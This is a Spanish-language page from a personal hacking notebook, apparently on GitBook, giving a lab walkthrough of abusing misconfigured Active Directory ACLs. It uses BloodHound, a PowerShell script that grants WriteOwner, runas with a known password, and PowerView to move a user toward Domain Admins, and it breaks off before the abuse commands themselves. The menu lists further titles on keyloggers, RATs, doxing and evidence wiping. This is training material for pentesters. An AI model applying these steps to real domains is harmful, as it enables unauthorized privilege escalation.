h4cker_b00k
  • Whoami
  • ARTIUCLOS
    • Tratamiento para la TTY
    • Permisos SUID
    • Honeypot
    • File2ban Privilege Escalation
    • Reversing Shell's (Creación)
    • Pfsense Firewall Configuración GUIA
    • EternalBlue Conf y Explotación
    • BlueKeep Conf y Explotación
    • Pass-The-Hash en Metasploit
    • Keylogger Automatizado
    • Visualizar Webcam en Windows
    • Kernel Conf Exploit
    • RevrseShell Oculta en windows
    • Crear CTF en Docker
    • Crear Dominio y Subdominio en apache2
    • Sticky Keys Hack
    • Bypass Login Linux (GRUB)
    • WOL (Wake On Lan) Conf
    • Shell Persistente PowerShell
    • Remcos (Técnica RAT)
    • Entorno virtual Anaconda/Miniconda Python
    • CVE-2024-10924 (Bypass-MFA-Wordpress)
    • CVE-2024-21413 (Outlook)
    • CVE-2023-32784 (Keepass-password-dump)
    • FTP vsftpd-2.3.4 backdoor
    • Activación de Office Permanente
    • Instalar SPSS (crack)
    • Servidor Node.js en Windows
    • Establecer Banner de entrada Ubuntu Server
    • Configuración de VLANs en Switch (PuTTY)
    • Crear Entorno Vulnerable en Nube Local (Docker)
  • Linux
    • Determinar S.O. (Victima)
  • Windows
    • Comandos Windows S.0.
    • Bypass UAC (Windows)
  • HERRAMIENTAS/TÉCNICAS
    • HackingWeb
      • SQL Injection
      • XSS (Cross Site Scripting)
      • NoSQL Injection
      • XXE Injection
      • Serialización/Deserialización
        • Deserialización Insegura Java (LAB)
        • Deserialización Insegura (PHP, Python y Java)
        • Deserialización Insegura PHP
        • Deserialización Insegura Python
      • Vulnerabilidad Open Redirect
      • XEE (XML External Entity Injection)
      • SSTI (Server-Side Template Injection)
      • Prototype Pollution (Contaminación de prototipos) JavaScript
      • IDOR (Insecure Direct Object Reference)
      • CORS (Cross-Origin Resource Sharing)
        • PortSwigger - CORS vulnerability with basic origin reflection
      • CSRF (Cross-Site Request Forgery)
    • Ingeniería Inversa
      • Radare2
    • Reconocimiento
      • NMAP
      • Dominios/Subdominios
      • Fuzzing
      • Crackmapexec
    • Explotación
      • LFI (Local File Inclusion)
      • Evil-winrm
      • Serealizacion/Deserealizacion
      • Poetry
    • Post-Explotación
      • Port Forwarding
      • A.D. Group Server Operators
      • Decrypt Firefox
    • Criptología
      • Openssl bruteforce script
    • Phishing
      • Phishing - Tools
      • Phishing Técnicas y Resultados
    • BadUSB
      • Digispark/USB Ninja (Función)
      • Digispark (Script)
      • Lista de signos Digispark
      • Bash Bunny
      • ScreenCrab
      • KeyCroc
      • Rubber Ducky
      • USB AutoRun
    • Hacking ActiveDirectory
      • KERBEROASTING Active Directory
      • Active Directory Hacking (Practicas-Teoria)
      • Active Directory Hacking (Auditorias entorno real)
    • DOXEO
      • BoxPiper Pagina Doxeo
      • Epieos Pagina Doxeo
      • Exposed Pagina Doxeo (Correo, numero, etc...)
      • GitHub Para Doxear
      • Hunter Pagina Doxeo
      • IntelligenceX Pagina Doxeo
      • OSINT Industries Pagina Doxeo (Correo, numero, etc...)
      • Phomber GitHub (Doxeo Numero de Teléfono)
      • Temp Mail Pagina Correos Temporales
    • Hacking Wifi
      • Reaver
      • Aircrack-ng (Practica)
    • BOF
      • Introducción
      • ret2win
      • Secuencias de De Bruijn
      • Shellcode
      • NOPs
      • 32-bit vs 64-bit
      • No eXecute (NX)
      • Programación Orientada al Retorno (ROP)
      • Error de Cadena de Formato
      • Stack Canaries
      • Ejecutables Independientes de Posición (PIE)
      • Aleatorización del Espacio de Direcciones (ASLR)
      • Sobrescritura de la Tabla de Desplazamiento Global (GOT)
      • RELRO (Relocation Read-Only)
      • Shellcode Confiable
      • One Gadgets y Malloc Hook
      • Syscalls (Llamadas al Sistema)
      • ret2dlresolve
      • ret2csu
      • Explotación a Través de Sockets
      • Creación de Procesos: fork
      • Stack Pivoting
  • CTF
    • VulnHub
      • Basic_Pentesting_1 VulnHub
      • Basic_Pentesting2 VulbHub
      • Corrosion2 VulnHub
      • BassamCTF VulnHub
      • BORN2ROOT_2 VulnHub
      • CengBox VulnHub
      • Chill_hack VulnHub
      • CK-00 VulnHub
      • Clover_1 VulnHub
      • Cofeeaddicts VulnHub
      • Connect-The-Dots VulnHub
      • djinn_2 VulnHub
      • driftingblues_7 VulnHub
      • doubletrouble VulnHub
      • Dripping_blues VulnHub
      • Durian VulnHub
      • Election VulnHub
      • Empire Lupin One VulnHub
      • EVILBOX_ONE VulnHub
      • Funbox_Lunchbreaker VulnHub
      • Gaara VulnHub
      • Gigachad_vh VulnHub
      • HACK ME PLEASE VulnHub
      • HACKATHONCTF2 VulnHub
      • Hackeable ll VulnHub
      • Hacksudo_Aliens VulnHub
      • Ica1 VulnHub
      • Jangow VulnHub
      • Jetty VulnHub
      • LiterallyVulnerable VulnHub
      • Masashi VulnHub
      • MINU_1 VulnHub
      • Momentum VulnHub
      • MoneyBox VulnHub
      • Monitoring VulnHub
      • Noob VulnHub
      • Odin VulnHub
      • Photographer VulnHub
      • Prime_2 VulnHub
      • PYLINGTON VulnHub
      • RootThis_1 VulnHub
      • Seppuku VulnHub
      • shenron-3 VulnHub
      • Shuriken_1 VulnHub
      • So_simple_1 VulnHub
      • Stapler VulnHub
      • Sumo VulnHub
      • SUNSET_DUSK VulnHub
      • Symfonos_1 VulnHub
      • System_failure VulnHub
      • Thales VulnHub
      • THOTH_TECH_1 VulnHub
      • unknowndevice64 VulnHub
      • Vikings VulnHub
      • ColddBoxEasy_EN VulnHub
      • KB-VULN3 VulnHub
      • Funbox_CTF_4 VulnHub
      • NASEF_1 LOCATING TARGET VulnHub
      • NiveK VulnHub
    • HackTheBox
      • Usage HackTheBox
      • Perfection HackTheBox
      • Headless HackTheBox
      • Editorial HackTheBox
      • Builder HackTheBox
      • BoardLight HackTheBox
      • Bizness HackTheBox
      • Chemistry HackTheBox
      • Titanic HackTheBox
    • TryHackMe
      • RootMe TryHackMe
      • Bounty Hacker TryHackMe
      • Mr Robot CTF TryHackMe
      • Creative TryHackMe
    • Dockerlabs
      • AaguaDeMayo DockerLabs (Easy)
      • Asucar DockerLabs (Intermediate)
      • Bashpariencias DockerLabs (Intermediate)
      • Chocolatefire DockerLabs (Intermediate)
      • Collections DockerLabs (Intermediate)
      • Skullnet Dockerlabs (Difícil)
      • Mirame DockerLabs (Easy)
      • Buscalove DockerLabs (Easy)
      • Hidden DockerLabs (Intermediate)
      • Hackpenguin DockerLabs (Intermediate)
      • Fileception DockerLabs (Intermediate)
      • Domain DockerLabs (Intermediate)
      • ChatMe DockerLabs (Intermediate)
      • Devil DockerLabs (Intermediate)
      • Usersearch DockerLabs (intermediate)
      • Insecure DockerLabs (Hard)
      • Debugme DockerLabs (Hard)
      • Forgotten_portal DockerLabs (Intermediate)
      • Elevator DockerLabs (Easy)
      • Stack DockerLabs (Intermediate)
      • Hedgehog DockerLabs (Very Easy)
      • Report DockerLabs (intermediate)
      • Reverse DockerLabs (intermediate)
      • Reflection DockerLabs (Easy)
      • Spain DockerLabs (Hard)
      • Raas DockerLabs (Hard)
      • Database DockerLabs (Intermediate)
      • DevTools DockerLabs (intermediate)
      • Dockerlabs DockerLabs (Easy)
      • PyRed DockerLabs (Intermediate)
      • SecretJenkins DockerLabs (Easy)
      • Backend DockerLabs (Easy)
      • Eclipse DockerLabs (intermediate)
      • Cachopo DockerLabs (Intermediate)
      • Fooding DockerLabs (Intermediate)
      • Extraviado DockerLabs (Easy)
      • DockHackLab DockerLabs (Intermediate)
      • SummerVibes DockerLabs (Hard)
      • WalkingCMS DockerLabs (Easy)
      • Patriaquerida DockerLabs (Easy)
      • Psycho DockerLabs (Easy)
      • Picadilly DockerLabs (Easy)
      • Anonymouspingu DockerLabs (Easy)
      • Veneno DockerLabs (Intermediate)
      • DoubleTrouble DockerLabs (Hard)
      • FindYouStyle DockerLabs (Easy)
      • Move DockerLabs (Easy)
      • Los 40 Ladrones DockerLabs (Easy)
      • Library DockerLabs (Easy)
      • NorC DockerLabs (Hard)
      • Predictable DockerLabs (Hard)
      • Winterfell DockerLabs (Easy)
      • Pntopntobarra DockerLabs (Easy)
      • ConsoleLog DockerLabs (Easy)
      • Queuemedic DockerLabs (Hard)
      • Stranger DockerLabs (Intermediate)
      • WhereIsMyWebShell DockerLabs (Easy)
      • Insanity DockerLabs (Hard)
      • NodeClimb DockerLabs (Easy)
      • MyBB DockerLabs (Intermediate)
      • Seeker DockerLabs (Intermediate)
      • sjd DockerLabs (Very Easy)
      • Hiddencat DockerLabs (Easy)
      • Verdejo DockerLabs (Easy)
      • ChocolateLovers DockerLabs (Easy)
      • Pinguinazo DockerLabs (Easy)
      • Vendetta DockerLabs (Easy)
      • Pequenas-mentirosas DockerLabs (Easy)
      • Balulero DockerLabs (Easy)
      • Whoiam DockerLabs (Easy)
      • Apolos DockerLabs (Intermediate)
      • Injection DockerLabs (Very Easy)
      • Unrecover DockerLabs (Intermediate)
      • Trust DockerLabs (Very Easy)
      • Firsthacking DockerLabs (Very Easy)
      • BreakMySSH DockerLabs (Very Easy)
      • Borazuwarahctf DockerLabs (Very Easy)
      • Vacaciones DockerLabs (Very Easy)
      • Obsession DockerLabs (Very Easy)
      • Swiss DockerLabs (Intermediate)
      • Internship DockerLabs (Easy)
      • Canario DockerLabs (Hard)
      • ApiRoot DockerLabs (Intermediate)
      • Amor DockerLabs (Easy)
      • Walking Dead DockerLabs (Easy)
      • Master DockerLabs (Intermediate)
      • StrongJenkins DockerLabs (Intermediate)
      • PingPong DockerLabs (Intermediate)
      • Allien DockerLabs (Easy)
      • Paradise DockerLabs (Easy)
      • ApiBase DockerLabs (Easy)
      • Smashing DockerLabs (Hard)
      • Rubiks DockerLabs (Intermediate)
      • Inclusion DockerLabs (Intermediate)
      • Sites DockerLabs (Intermediate)
      • Upload DockerLabs (Easy)
      • ShowTime DockerLabs (Easy)
      • MachuPicchu DockerLabs (Intermediate)
      • ChocoPing DockerLabs (Intermediate)
      • Crystalteam DockerLabs (Intermediate)
      • Balufood DockerLabs (Easy)
      • Bicho DockerLabs (Easy)
      • Gallery DockerLabs (Hard)
      • Ciberguard DockerLabs (Intermediate)
      • Galeria DockerLabs (Easy)
      • TheDog DockerLabs (Intermediate)
    • BugBountyLabs
      • Reflection BugBountyLabs (Principiante)
      • Escape BugBountyLabs (Principiante)
      • DogShow BugBountyLabs (Avanzado)
      • Trr0rlabs BugBountyLabs (Avanzado)
      • XSSaS BugBountyLabs (Experto)
      • Redirection BugBountyLabs (Principiante)
      • HiddenRedirection BugBountyLabs (Principiante)
      • Corsy BugBountyLabs (Avanzado)
      • Forgery BugBountyLabs (Principiante)
      • ConnectX BugBountyLabs (Principiante)
      • NeoMarket BugBountyLabs (Avanzado)
      • Access BugBountyLabs (Principiante)
      • Listing BugBountyLabs (Principiante)
    • TheHackersLabs
      • Quokka (Windows) TheHackersLabs (Principiante)
      • Microchoft (Windows) TheHackersLabs (Principiante)
      • Ensalá Papas (Windows) TheHackersLabs (Principiante)
      • Accounting (Windows) TheHackersLabs (Principiante)
      • Cocido Andaluz (Windows) TheHackersLabs (Principiante)
      • Espeto Malagueño (Windows) TheHackersLabs (Principiante)
    • HackMyVM
      • Liar HackMyVM (Easy - Windows)
      • Zero HackMyVM (Easy - Windows)
      • Simple HackMyVM (Easy - Windows)
      • TriplAdvisor HackMyVM (Easy - Windows)
      • Runas HackMyVM (Easy - Windows)
      • Always HackMyVM (Easy - Windows)
      • DC01 HackMyVM (Easy - Windows)
      • quoted HackMyVM (Easy - Windows)
      • Nessus HackMyVM (Easy - Windows)
      • Jan HackMyVM (Easy - Linux)
      • DC02 HackMyVM (Intermediate - Windows)
      • Qweasd HackMyVM (Intermediate - Linux)
      • Gift HackMyVM (Easy - Linux)
      • Pingme HackMyVM (Intermediate - Linux)
      • Smol HackMyVM (Intermediate - Linux)
      • Noob HackMyVM (Easy- Linux)
      • Pingme HackMyVM (Intermediate - Linux)
      • Hundred HackMyVM (Intermediate - Linux)
      • Driftingblues6 HackMyVM (Easy- Linux)
      • Alzheimer HackMyVM (Easy- Linux)
      • Tron HackMyVM (Easy- Linux)
      • Superhuman HackMyVM (Easy- Linux)
      • Ripper HackMyVM (Easy- Linux)
      • Gigachard HackMyVM (Easy- Linux)
      • Hidden HackMyVM (Easy- Linux)
      • Method HackMyVM (Easy- Linux)
      • Hostname HackMyVM (Easy- Linux)
      • BaseME HackMyVM (Easy- Linux)
      • May HackMyVM (Intermediate - Linux)
      • Driftingblues3 HackMyVM (Easy- Linux)
      • hommie HackMyVM (Easy- Linux)
      • forbidden HackMyVM (Intermediate- Linux)
      • t800 HackMyVM (Easy - Linux)
      • Twisted HackMyVM (Easy- Linux)
      • Connection HackMyVM (Easy - Linux)
      • Flower HackMyVM (Easy- Linux)
      • Helium HackMyVM (Easy- Linux)
      • Suidy HackMyVM (Intermediate - Linux)
      • WebMaster HackMyVM (Easy - Linux)
      • Locker HackMyVM (Easy - Linux)
      • Soul HackMyVM (Hard - Linux)
      • Visions HackMyVM (Easy - Linux)
      • Friendly3 HackMyVM (Easy - Linux)
      • Friendly HackMyVM (Easy - Linux)
      • Friendly2 HackMyVM (Easy - Linux)
      • Comingsoon HackMyVM (Easy - Linux)
      • SuidyRevenge HackMyVM (Hard - Linux)
      • Insomnia HackMyVM (Easy - Linux)
      • Uvalde HackMyVM (Easy - Linux)
      • System HackMyVM (Easy - Linux)
    • CTF's
      • CTF Avengers Easy
      • CTF Ciberhack Intermediate
      • Ghost CTF Hard
      • CTF Cyb3rSh1€ld Intermediate
      • CTF HackMeDaddy Hard
      • CTF inj3ct0rs Intermediate
      • CTF LFI.elf Easy
      • CTF Ctrl-X Easy
      • CTF r00tless Hard
      • CTF 0xc0ffee Intermediate
      • CTF Memesploit Intermediate
      • CTF Jenkhack Easy
      • CTF chmod-4755 Intermediate
      • CTF 404-not-found Easy
      • CTF dance-samba Intermediate
      • CTF VulnVault Intermediate
      • CTF CrackOff Hard
      • CTF PressEnter Easy
      • CTF Mapache2 Intermediate
      • CTF Hackzones Intermediate
      • CTF Darkweb Hard
      • CTF Flow Hard
      • CTF Sender Intermediate
      • CTF Cracker Intermediate
      • CTF Express Intermediate
      • CTF CineHack Intermediate
      • CTF LifeOrDead Hard
      • CTF TpRoot Very Easy
      • CTF Gitea Intermediate
      • CTF SecureLAB Hard
      • CTF Goodness Easy
      • CTF LogisticCloud Intermediate
  • Conceptos de Ciberseguridad en Hacking Ético
    • Contenido...
      • Teoría Hacking Ético
        • Introducción
      • Recopilación Pasiva de información
        • Introducción
        • Hacking con buscadores de internet
        • Pagina Shodan
        • Pagina Censys
        • Registros o BBDD Whois
        • Archive (Análisis de información histórica)
        • TheHarvester
          • TheHarvester Herramienta
          • Bloqueo temporal de dirección IP pública
        • Maltego
          • Instalacion de maltego en kali linux
          • Funcionamiento de Maltego
          • Instalar transformador con API Key
          • Utilizar transformador shodan en maltego
        • Recon-ng Herramienta
      • Recopilación Semi-Pasiva de información
        • Introducción
        • Entorno controlado (LAB)
        • FOCA (Análisis de metadatos)
          • Introducción FOCA
          • Instalar FOCA
          • Funciones de FOCA
        • Herramientas alternativas para Kali de extracción de metadatos
          • Herramienta Metagoofil
          • Herramienta Metashield-analyzer
        • Introducción al protocolo DNS
        • CentralOps y DNSdumpster
          • CentralOps
          • DNSdumpster
        • Sniffers
          • Wireshark
          • TCPdump
      • Recopilación Activa de información
        • Introducción
        • Metasploitable3
          • Entorno vulnerable (Metasploitable3 (Presentación))
          • Instalacion de Metasploitable3
          • Linux Ubuntu-Windows Server 2008 - Metasploitable3
        • DNSRecon Herramienta (Ficheros de zona)
        • Nmap Herramienta
          • Introducción
          • Descubrimiento de hosts (Host Discovery)
          • Escaneo de puertos
          • Descubrimiento de servicios
          • Amap (descubrimiento de servicios)
          • Nmap (identificación del sistema operativo)
          • Nmap (SMB Enumeration)
          • Nmap (SNMP enumeration)
      • Análisis de vulnerabilidades
        • Introducción
        • CVE, CVSS, CPE - Common Vulnerabilities and Exposures
        • Análisis de vulnerabilidades con Nmap
        • Nessus Herramienta (Mas utilizada)
          • Instalación Nessus
          • Nessus (Análisis básico de vulnerabilidades)
          • Nessus (Análisis avanzado de vulnerabilidades)
        • Otras Herramientas
      • Explotación y Hacking de vulnerabilidades en Hosts
        • Explotación de vulnerabilidades
        • Explotacion manual de vulnerabilidades Host
        • Metasploit Herramienta
          • Introducción
          • Metasploit (Explotación básica)
          • Metasploit (explotación avanzada)
          • Metasploit (Creación de payloads personalizados)
          • Metasploit (Importando los resultados de Nessus)
          • Armitage (interfaz grafica de metasploit)
      • Explotación y Hacking de vulnerabilidades Web
        • Instalación de maquina virtual Ubuntu
        • Instalación aplicación Web vulnerable (Mutillidae II)
        • Burp Suite
          • Introducción
          • Spidering y Crawling con Burp Suite y skipfish
          • Inyecciones de codigo y contexto
        • Introducción (SQL Injection)
        • SQLmap Herramienta
          • SQLmap (Blind SQL Injection - Parte 1)
          • SQLmap (Funcionalidad - Parte 2)
        • Path Traversal o Directory Traversal
        • WebShells
        • Unrestricted File Upload
        • HTML Injection y Cross-Site-Scripting (XSS)
        • CSRF (Cross-site request forgery)
        • XSStrike Herramienta
        • Otras técnicas de explotación (Cookie Tampering, command injection...)
          • Command Injection
          • Cookie Tampering
        • Info Extra Burp Suite
      • Explotación y Hacking de vulnerabilidades en Red
        • Man in the middle (MITM)
        • Introducción e instalación de Bettercap
        • ARP Spoofing
        • DNS Spoofing
        • Social Engineering ToolKit (SET)
        • Polymorph Herramienta
          • Manipulación de trafico de red en tiempo real
          • Polymorph (Manipulación de trafico ICMP)
          • Polymorph (Manipulación de trafico MQTT)
          • BONUS (Explotando un fallo de seguridad en Windows 10)
          • DEMO (Explotación avanzada WINREG)
      • Técnicas de Post-Explotación
        • Introducción (Técnica de Post-Explotación)
        • Linux-Windows Meterpreter Post-Explotación
          • Linux (Meterpreter para Post-Explotación)
          • Windows (Meterpreter para Post-Explotación)
          • Elevación de privilegios (UAC Bypass)
          • Volcado de memoria con Mimikatz
        • Procdump y lsass.exe
        • Cracking de contraseñas (John the ripper y Hashcat)
        • Backdoors en binarios
        • Migración de meterpreter a otro proceso
        • Borrado de evidencias
          • Info
          • Linux (Herramientas Borrado de evidencias)
          • Windows (Herramientas Borrado de evidencias)
          • Archivos relevantes para eliminar
            • Rutas Windows Importantes que borrar
            • Rutas Linux Importantes que borrar
      • Machine Learning aplicado a Hacking
        • Introducción
        • Machine Learning aplicado a la Ciberseguridad
        • BATEA (Reconocimiento de hosts con ML)
        • Pesidious (Mutaciones con Deep Learning)
        • Ingeniería Social - Deep fake
  • ciberseguridad avanzada hacking ético
    • Contenido...
      • Entorno de aprendizaje
        • CherryTry
        • Entorno de trabajo (Kali Linux)
      • Recopilación avanzada de información
        • Introducción
        • Preparación del entorno - VulnHub
        • Preparación del entorno - Snort
        • Escaneo Avanzado de Hosts - Parte l
        • Escaneo avanzado de puertos
        • Fragmentación de paquetes con Nmap
        • Escaneo utilizando señuelos con Nmap
        • Spoofing de la identidad del atacante con Nmap
        • Control de velocidad de escaneo con Nmap
        • Escaneo en IPv6 con Nmap
        • Escaneo avanzado de servicios y OS
        • Alternativas a Nmap - Naabu y Netcat
        • Escaneo de puertos ultrarrápido - Masscan
      • Hacking Ético en entornos Active Directory - Parte 1
        • Introducción
        • Instalación y configuración del DC
        • Instalación de máquinas Windows en dominio
        • Características de AD - Usuarios, Grupos y OUs
        • Características de AD - GPOs y recursos compartidos
        • Recopilación de información en Active Directory
        • PowerView
        • Enumeración local de SAM
        • Enumeración remota de SAM
        • Impacket y Rpcclient
        • AD Module
        • Enumeración de NTDS - Parte 1
        • Enumeración de NTDS - Parte 2
        • Ldapsearch, pywerview, jxplorer
        • BloodHound
      • Hacking Ético en entornos Active Directory - Parte 2
        • Descriptores de seguridad y ACLs
        • Vulnerable AD
        • Identificación de ACLs vulnerables
        • Explotación de ACLs vulnerables
        • Explotación DCSync
        • Password Spraying
        • Funcionamiento de Kerberos
        • Kerberos en Active Directory
        • Enumeración de usuarios con Kerberos
        • Fuerza bruta con Kerberos
        • AS-REQ Roasting
        • Instalación Rubeus
        • AS-REP Roasting
        • TGS-REP Roasting (Kerberoasting)
      • Acceso a credenciales y movimientos laterales
        • Autenticación y Autorización en Windows
        • Volcado de Isass y SAM en Windows
        • Volcado de Isass y SAM en Linux
        • Volcado de credenciales de dominio cacheadas (mscash)
        • Pass-The-Hash con Windows
        • Pass-The-Hash con Linux
        • Over Pass-The-Hash - Pass-The-Key
        • Pass-The-Ticket
        • ASK-TGT - TGS
        • Kerberos Golden Ticket y Silver Ticket
        • NTLM Roasting
        • LLMNR - NBTNS Poisoning
        • NTLM - SMB Relay
        • Token impersonation
        • Problemas y errores instalación Covenant
        • Frameworks de postexplotación - Covenant
      • Hacking avanzado de aplicaciones web y Bug Bounty
        • Una palabras sobre Bug Bounty
        • Preparación del entorno vulnerable
        • Identificación de subdominios - Subfinder, Sublist3r y Subbrute
        • Identificación de tecnologías web - WhatWeb y WebAnalyzer
        • Identificación de contenido - Dirbuster
        • Gobuster y Seclists
        • Análisis de vulnerabilidades - OWASP ZAP Proxy
        • Nikto y Skipfish
        • Nuclei y Nuclei Templates
        • Fuzzing básico con ffuf
        • Fuzzing avanzado con ffuf
        • Explotación - Commix
        • Changeme, Gitleaks y CyberChef
      • Detección y evasión de defensas
        • Introducción a la evasión de defensas
        • Load Balancing detector - halberd
        • WAF detector - wafw00f
        • Evasión de WAF
        • Evasión de antivirus con C - Parte 1
        • Evasión de antivirus con C - Parte 2
        • Otras técnicas de evasión con C
        • Evasión de detección en tiempo real
        • Evasión con GreatSCT
        • Evasión con TheFatRat
        • Otras herramientas de evasión - Veil, Shellter, MSFManía...
      • Hacking Ético y Post-explotación avanzada
        • Port Forwarding
        • Port Forwarding con SSH
        • Pivoting
        • Netcat Port-Pivot Relay
        • Local Tunneling - LocalTunnel y Ngrok
        • Transferencia de ficheros
      • Hacking Ético en entornos reales (Amazon AWS)
        • Arquitectura y registro en la nube (AWS)
        • Infraestructura de red en la nube (AWS)
        • Seguridad y Computación en la nube (AWS)
        • Balanceadores y almacenamiento en la nube (AWS)
        • Recopilación de información en un entorno real
        • Controles de seguridad en un entorno real
        • Auditando la infraestructura interna
        • Tipos de auditorias de seguridad
  • PROYECTO DAM
    • Documentación PROYECTO_DAM
Powered by GitBook
On this page
  • Acceder desde un equipo de un usuario de Windows mediante terminal a otro usuario del dominio
  • Elevacion a grupo Project management mediante el permiso OwnerWrite
  • Elevacion a grupo Office Admin mediante el permiso GenericWrite
  • Elevacion a grupo Domain Admins mediante el permiso WriteDacl
  1. ciberseguridad avanzada hacking ético
  2. Contenido...
  3. Hacking Ético en entornos Active Directory - Parte 2

Explotación de ACLs vulnerables

PreviousIdentificación de ACLs vulnerablesNextExplotación DCSync

Last updated 2 months ago

Para que nos se sobreponga una informacion con otra, vamos a borrar la base de datos del BloodHound y vamos a volver a descargar con la herramienta de BloodHound en Windows la base de datos para cargarla de 0, primero tendremos que hacer un cambio en el DC y sera añadir al grupo de Proyect Management el grupo llamado Accounting, despues añadimos al grupo Proyect Management el grupo Office Admins, tambien vamos añadir a 4 usuarios al grupo de Accounting, uno de ellos tiene que llevar en la descripcion su contraseña en este caso Passw0rd5, resetearle la contraseña a esa misma y una vez echo eso, nos descargamos la base de datos para el BloodHound.

Esto lo hacemos por que en un caso real puede ser asi perfectamente ya que muchos usuarios tienen en la descripcion su contraseña para que el otro que venga sepa cual es, pero es una mala practica que muchas empresas siguen.

Nos pasamos el ZIP al kali y antes de cargarlo borramos la base de datos:

Una vez borrada, cargamos el ZIP y buscamos lo siguiente.

Por lo que veremos algo asi:

Pongamos que en el grupo que estamos viendo de Accounting nos esta desglosando los 7 usuarios que estan dentro de dicho grupo, pero pongamos que tenemos comprometida la maquina del usuario Annice que esta dentro del grupo Accounting, podremos hacer lo siguiente para escalar privilegios.

Pero si por ejemplo queremos utilizar otro grupo por que este script te genera todo de forma aleatoria, podremos hacerlo con otro, como por ejemplo con el grupo SALES, imaginemos que de ese grupo tenemos comprometida la maquina del usuario Kettie podremos hacer diversas cosas, pero vamos a volver a donde estabamos con el de Accounting pongamos que tenemos esta estructura de permisos:

Usuario -> Grupo Accounting -> GenericWrite al grupo Proyect Management -> GenericWrite al grupo Office Admin -> Member of Administradores de empresas -> WriteDacl al grupo Admins del dominio

Si vemos que permisos tienen los grupos sobre el grupo de Project Management, veremos lo siguiente:

Entre ellos esta Accounting que puede hacer un GenericWrite a dicho grupo.

Por lo que vamos a intentar convertir el usuario Annice del grupo de Accounting en un usuario Administrador.

Como sabemos que su contraseña es Passw0rd5 ya que lo tiene apuntado, podremos acceder a dicho usuario, sabemos que este usuario actualmente no tiene ningun privilegio de administrador, pero vamos a intentar escalar de la siguiente forma.

Mas adelante explotaremos el privilegio de GenericWrite, por lo que podemos ver el grupo Accounting tambien tiene el privilegio de WriteOwner, por lo que vamos a explotar dicho privilegio.

Si no os aparece WriteOwner tendremos que hacer lo siguiente en un PowerShell del DC:

Get-ADObject -Filter { Name -eq "Project Management" } -Properties DistinguishedName

Info:

DistinguishedName                               Name               ObjectClass ObjectGUID
-----------------                               ----               ----------- ----------
CN=Project management,CN=Users,DC=corp,DC=local Project management group       3cdf74f5-a3a1-4a9a-9974-78905eb15a53

Sabiendo la ruta absoluta, pondremos el siguiente script en .ps1.

# Grupo que recibirá permisos
$principal = "Accounting"

# Distinguished Name del objeto de destino (Project Management)
$targetDN = "CN=Project management,CN=Users,DC=corp,DC=local"

# Obtener objeto de destino
$targetObject = Get-ADObject -Filter { DistinguishedName -eq $targetDN }
if (-not $targetObject) {
    Write-Host "El objeto objetivo no fue encontrado. Verifica el DN." -ForegroundColor Red
    return
}

# Obtener ACL del objeto de destino
try {
    $acl = Get-Acl -Path "AD:$($targetObject.DistinguishedName)"
    if (-not $acl) {
        Write-Host "No se pudo obtener la ACL. Verifica los permisos y la conexión." -ForegroundColor Red
        return
    }
} catch {
    Write-Host "Error al obtener ACL: $_" -ForegroundColor Red
    return
}

# Crear un nuevo Access Control Entry (ACE) para WriteOwner
try {
    $ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
        (New-Object System.Security.Principal.NTAccount($principal)), # Nombre del grupo que recibirá el permiso
        "WriteOwner",                                                 # Permiso: WriteOwner
        "Allow"                                                       # Acción: Permitir
    )
} catch {
    Write-Host "Error al crear el ACE: $_" -ForegroundColor Red
    return
}

# Agregar el ACE a la ACL
try {
    $acl.AddAccessRule($ace)
} catch {
    Write-Host "Error al agregar el ACE a la ACL: $_" -ForegroundColor Red
    return
}

# Aplicar los cambios en la ACL
try {
    Set-Acl -Path "AD:$($targetObject.DistinguishedName)" -AclObject $acl
    Write-Host "Permiso WriteOwner añadido exitosamente." -ForegroundColor Green
} catch {
    Write-Host "Error al aplicar ACL: $_" -ForegroundColor Red
}

Y si comprobamos los permisos...

(Get-Acl -Path "AD:CN=Project management,CN=Users,DC=corp,DC=local").Access | Where-Object { $_.IdentityReference -like "*Accounting*" }

Info:

ActiveDirectoryRights : GenericWrite, WriteOwner
InheritanceType       : None
ObjectType            : 00000000-0000-0000-0000-000000000000
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : None
AccessControlType     : Allow
IdentityReference     : CORP\accounting
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None

Vemos efectivamente que tiene el GenericWrite y el WriteOwner.

Por lo que si importamos de nuevo la base de datos al BloodHound veremos algo asi:

Ahora veremos 2 lineas apuntando al Project Managment una siendo GenericWrite y la otra OwnerWrite.

Por lo que vamos a ver como explotar la vulnerabilidad de WriteOwner.

Acceder desde un equipo de un usuario de Windows mediante terminal a otro usuario del dominio

Lo que vamos hacer primeramente es saber como acceder a la cuenta de otro usuario cuando ya previamente estamos en la cuenta de un usuario en un equipo de Windows como por ejemplo puede ser empleado1y queremos acceder a la cuenta de Annice.

Lo que vamos hacer es buscar C:\Windows\System32\WindowsPowerShell\v1.0 en la carpeta y en el ejecutable de PowerShell.exe le daremos a Shift + Click derecho y nos aparecera esto:

Le daremos a Ejecutar como otro usuario.

Metemos como usuario annice.mable y la contraseña que era Passw0rd5.

Y vemos que estamos con dicho usuario:

Si por ejemplo no tubieramos acceso a la interfaz grafica y solo por terminal, podremos hacer lo mismo pero de la siguiente forma:

runas /user:corp\annice.mable powershell

Y se nos abrira un powershell como el usuario que especificamos como podremos ver.

Pero no podremos listar los archivo del empleado1 ya que no tenemos permiso, por lo que recomiendo hacer lo siguiente ya que tenemos el script en dicho usuario, podremos hacer que este usuario annice tenga permisos para ello en el escritorio del empleado1 para que asi podamos cargar el script bajo el TOKEN del usuario annice.

cd ./Desktop
runas /user:corp\annice.mable /netonly powershell

Esto nos abrira la terminal bajo el usuario annice y si probamos a listar los archivos...

cd C:\Users\empleado1\Desktop\
ls

Info:

Directorio: C:\Users\empleado1\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        12/01/2025     12:16          18175 20250112121622_BloodHound.zip
-a----        07/01/2025     21:33         532856 new_powerview.ps1
-a----        07/01/2025     21:20         770279 PowerView.ps1
-a----        11/01/2025     11:41        1308764 sh.ps1
-a----        12/01/2025     12:16          24786 Yjc5NGZkZjMtMWQ5Ny00ZTUzLTg5ZjktODAzMDI2ZDgxZDI3.bin

Vemos que ahora si nos deja, por lo que vamos a cargar el script de PowerView para utilizarlo.

. .\new_powerview.ps1

Lo que vamos hacer es que mediante una vulnerabilidad con el WriteOwner hagamos que el usuario anncie sea del grupo Project Managment.

Si nosotros nos vamos a la informacion de lo que puede hacer este permiso:

Y si nos vamos a la pestaña Windows Abuse podremos ver como abusar de estos permisos para poder conseguir nuestro objetivo dandonos varias opciones de comandos.

